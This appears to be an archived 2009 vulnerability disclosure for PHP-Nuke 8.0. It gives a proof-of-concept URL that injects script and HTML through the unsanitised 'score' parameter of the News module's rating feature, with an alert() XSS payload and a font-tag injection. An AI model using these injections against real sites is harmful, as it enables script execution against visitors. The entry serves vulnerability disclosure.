id: 10034
date: 11/27/2009
title: PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module
author: K053
cves: 

========================================================
PHP-Nuke <= 8.0 XSS & HTML Code Injection in News Module
========================================================

# Software Link: http://www.phpnuke.org/modules.php?name=Downloads&d_op=viewdownload&cid=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
note :
 
This bug found by tampering passed data .
coders don't sanitize and check user entry point for news rate.
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POC:
 
http://server/modules.php?name=News&op=rate_complete&sid=6&score=[insert ur code here]
 
1. xss : <SCRIPT>alert(/XSS/.source)</SCRIPT>
2. Html code injection : <font color=red>
 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


#  0day.today [2023-03-22]  #